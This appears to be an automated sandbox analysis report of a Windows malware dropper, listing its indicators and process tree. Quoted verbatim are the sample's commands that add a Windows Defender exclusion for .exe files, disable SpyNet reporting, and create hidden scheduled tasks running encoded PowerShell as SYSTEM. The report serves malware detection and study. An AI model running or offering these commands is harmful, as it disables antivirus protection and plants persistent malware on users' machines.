Analysis
-
max time kernel
143s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2023 05:00
Static task
static1
General
-
Target
e8c640b8f3d560f61df2fd2fc88d6ccda0efc584e65c4e2331ba3fad052e5667.exe
-
Size
7.3MB
-
MD5
827316e96b34b12c36066d518ad84044
-
SHA1
cdcb1fc6e1507b0cb221e6dce8e88a985ca2dc61
-
SHA256
e8c640b8f3d560f61df2fd2fc88d6ccda0efc584e65c4e2331ba3fad052e5667
-
SHA512
d27a2aaa7e47bb64f6eb9b514baa5198d2d205c70c27de60c1cd774f0b86b4a902e62be24df428f81acc3dcf8c0b65c8a7230918c34d345aadd5639108293c5c
-
SSDEEP
196608:91OglwPe5QLQQ4l7drLW2UYlAu86VqBCg21To8:3OQSLQQqqQAuzaCgy5
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 104 4452 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation SmMwzrz.exe Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 4 IoCs
pid Process 4272 Install.exe 3112 Install.exe 1072 ekHGpuk.exe 2520 SmMwzrz.exe -
Loads dropped DLL 1 IoCs
pid Process 4452 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json SmMwzrz.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json SmMwzrz.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini SmMwzrz.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol ekHGpuk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 SmMwzrz.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C SmMwzrz.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData SmMwzrz.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini ekHGpuk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F SmMwzrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 SmMwzrz.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\NVRHnqqYuoKU2\hjfwzcsHVzYIu.dll SmMwzrz.exe File created C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\cDLJxjA.dll SmMwzrz.exe File created C:\Program Files (x86)\anbFGpaSVIJEC\nXVfUMj.xml SmMwzrz.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja SmMwzrz.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi SmMwzrz.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SmMwzrz.exe File created C:\Program Files (x86)\NVRHnqqYuoKU2\XiLmsox.xml SmMwzrz.exe File created C:\Program Files (x86)\anbFGpaSVIJEC\FvhiCgL.dll SmMwzrz.exe File created C:\Program Files (x86)\wbWGHgMzMEUn\IQMAPHn.dll SmMwzrz.exe File created C:\Program Files (x86)\PxtQEfdrU\jwcHzI.dll SmMwzrz.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi SmMwzrz.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SmMwzrz.exe File created C:\Program Files (x86)\PxtQEfdrU\cDEcGqh.xml SmMwzrz.exe File created C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\EKXRRCX.xml SmMwzrz.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bFvsKFifcttmubYYTU.job schtasks.exe File created C:\Windows\Tasks\uaXipkbyxrnNFDdtl.job schtasks.exe File created C:\Windows\Tasks\PhOAIbnrVHbfAsF.job schtasks.exe File created C:\Windows\Tasks\xOSrYfgHudgkQpnQd.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 456 schtasks.exe 2388 schtasks.exe 2784 schtasks.exe 3608 schtasks.exe 3044 schtasks.exe 4720 schtasks.exe 1992 schtasks.exe 3044 schtasks.exe 4316 schtasks.exe 4916 schtasks.exe 880 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{c2d04a06-0000-0000-0000-d01200000000} SmMwzrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket SmMwzrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume SmMwzrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" SmMwzrz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" SmMwzrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" SmMwzrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" SmMwzrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ SmMwzrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" SmMwzrz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{c2d04a06-0000-0000-0000-d01200000000}\NukeOnDelete = "0" SmMwzrz.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4480 powershell.EXE 4480 powershell.EXE 4480 powershell.EXE 3124 powershell.exe 3124 powershell.exe 4388 powershell.exe 4388 powershell.exe 5112 powershell.EXE 5112 powershell.EXE 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe 2520 SmMwzrz.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4480 powershell.EXE Token: SeDebugPrivilege 3124 powershell.exe Token: SeDebugPrivilege 4388 powershell.exe Token: SeDebugPrivilege 5112 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3868 wrote to memory of 4272 3868 e8c640b8f3d560f61df2fd2fc88d6ccda0efc584e65c4e2331ba3fad052e5667.exe 91 PID 3868 wrote to memory of 4272 3868 e8c640b8f3d560f61df2fd2fc88d6ccda0efc584e65c4e2331ba3fad052e5667.exe 91 PID 3868 wrote to memory of 4272 3868 e8c640b8f3d560f61df2fd2fc88d6ccda0efc584e65c4e2331ba3fad052e5667.exe 91 PID 4272 wrote to memory of 3112 4272 Install.exe 93 PID 4272 wrote to memory of 3112 4272 Install.exe 93 PID 4272 wrote to memory of 3112 4272 Install.exe 93 PID 3112 wrote to memory of 4488 3112 Install.exe 95 PID 3112 wrote to memory of 4488 3112 Install.exe 95 PID 3112 wrote to memory of 4488 3112 Install.exe 95 PID 3112 wrote to memory of 4716 3112 Install.exe 97 PID 3112 wrote to memory of 4716 3112 Install.exe 97 PID 3112 wrote to memory of 4716 3112 Install.exe 97 PID 4488 wrote to memory of 1348 4488 forfiles.exe 99 PID 4488 wrote to memory of 1348 4488 forfiles.exe 99 PID 4488 wrote to memory of 1348 4488 forfiles.exe 99 PID 4716 wrote to memory of 820 4716 forfiles.exe 100 PID 4716 wrote to memory of 820 4716 forfiles.exe 100 PID 4716 wrote to memory of 820 4716 forfiles.exe 100 PID 1348 wrote to memory of 3556 1348 cmd.exe 102 PID 1348 wrote to memory of 3556 1348 cmd.exe 102 PID 1348 wrote to memory of 3556 1348 cmd.exe 102 PID 820 wrote to memory of 1216 820 cmd.exe 101 PID 820 wrote to memory of 1216 820 cmd.exe 101 PID 820 wrote to memory of 1216 820 cmd.exe 101 PID 820 wrote to memory of 2808 820 cmd.exe 103 PID 820 wrote to memory of 2808 820 cmd.exe 103 PID 820 wrote to memory of 2808 820 cmd.exe 103 PID 1348 wrote to memory of 1400 1348 cmd.exe 104 PID 1348 wrote to memory of 1400 1348 cmd.exe 104 PID 1348 wrote to memory of 1400 1348 cmd.exe 104 PID 3112 wrote to memory of 3044 3112 Install.exe 108 PID 3112 wrote to memory of 3044 3112 Install.exe 108 PID 3112 wrote to memory of 3044 3112 Install.exe 108 PID 3112 wrote to memory of 4624 3112 Install.exe 110 PID 3112 wrote to memory of 4624 3112 Install.exe 110 PID 3112 wrote to memory of 4624 3112 Install.exe 110 PID 4480 wrote to memory of 4172 4480 powershell.EXE 114 PID 4480 wrote to memory of 4172 4480 powershell.EXE 114 PID 3112 wrote to memory of 4596 3112 Install.exe 123 PID 3112 wrote to memory of 4596 3112 Install.exe 123 PID 3112 wrote to memory of 4596 3112 Install.exe 123 PID 3112 wrote to memory of 456 3112 Install.exe 125 PID 3112 wrote to memory of 456 3112 Install.exe 125 PID 3112 wrote to memory of 456 3112 Install.exe 125 PID 1072 wrote to memory of 3124 1072 ekHGpuk.exe 135 PID 1072 wrote to memory of 3124 1072 ekHGpuk.exe 135 PID 1072 wrote to memory of 3124 1072 ekHGpuk.exe 135 PID 3124 wrote to memory of 1664 3124 powershell.exe 137 PID 3124 wrote to memory of 1664 3124 powershell.exe 137 PID 3124 wrote to memory of 1664 3124 powershell.exe 137 PID 1664 wrote to memory of 2680 1664 cmd.exe 138 PID 1664 wrote to memory of 2680 1664 cmd.exe 138 PID 1664 wrote to memory of 2680 1664 cmd.exe 138 PID 3124 wrote to memory of 2408 3124 powershell.exe 139 PID 3124 wrote to memory of 2408 3124 powershell.exe 139 PID 3124 wrote to memory of 2408 3124 powershell.exe 139 PID 3124 wrote to memory of 484 3124 powershell.exe 140 PID 3124 wrote to memory of 484 3124 powershell.exe 140 PID 3124 wrote to memory of 484 3124 powershell.exe 140 PID 3124 wrote to memory of 2424 3124 powershell.exe 141 PID 3124 wrote to memory of 2424 3124 powershell.exe 141 PID 3124 wrote to memory of 2424 3124 powershell.exe 141 PID 3124 wrote to memory of 3136 3124 powershell.exe 142 PID 3124 wrote to memory of 3136 3124 powershell.exe 142
Processes
-
C:\Users\Admin\AppData\Local\Temp\e8c640b8f3d560f61df2fd2fc88d6ccda0efc584e65c4e2331ba3fad052e5667.exe"C:\Users\Admin\AppData\Local\Temp\e8c640b8f3d560f61df2fd2fc88d6ccda0efc584e65c4e2331ba3fad052e5667.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\7zSEDAC.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Users\Admin\AppData\Local\Temp\7zSF184.tmp\Install.exe.\Install.exe /aodidZ "385118" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3556
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1400
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:820 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1216
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2808
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJnuQETbh" /SC once /ST 04:19:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJnuQETbh"4⤵PID:4624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJnuQETbh"4⤵PID:4596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bFvsKFifcttmubYYTU" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\ekHGpuk.exe\" 1c /Rysite_idjqB 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:456
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4172
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1484
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4988
-
